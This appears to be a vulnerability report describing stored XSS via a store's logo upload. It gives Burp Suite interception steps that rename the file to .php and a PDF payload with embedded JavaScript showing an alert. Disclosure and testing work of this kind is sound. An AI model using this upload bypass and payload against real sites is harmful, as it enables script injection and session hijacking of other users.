Description

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

1-Login to your application and create a Store called “Test” make all the other details as default

2. Navigate to “ Store Settings—>General” Tab
3. Under the “Branding” Section there is a “ Choose File” To select a Logo for our Store.
4. Select “Choose File” Option to Select an Image, Select any “.png” image you want.
5. Intercept the Post-Request for “Choose File” Option using Burpsuite
6. First delete the Content of uploaded “ png file “ then change the extension from “.png” to “.php” i.e( filename= "profile-picture.php") and in the Content add the below payload

##Payload: ```%PDF-1.3 %���� 1 0 obj <</Pages 2 0 R /Type /Catalog>> endobj 2 0 obj <</Count 1 /Kids [3 0 R] /Type /Pages>> endobj 3 0 obj <</AA <</O <</JS ( try { app.alert("bypass CSP XSS") } catch (e) { app.alert(e.message); } ) /S /JavaScript>>>> /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> /Type /Page>> endobj 4 0 obj <</Length 21>> stream

BT /F1 24 Tf ET

endstream endobj xref 0 5 0000000000 65535 f 0000000015 00000 n 0000000062 00000 n 0000000117 00000 n 0000000424 00000 n trailer

<</Root 1 0 R /Size 5>> startxref 493 %%EOF

7.  send the request and open the image you can see the xss 






# Impact




XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account.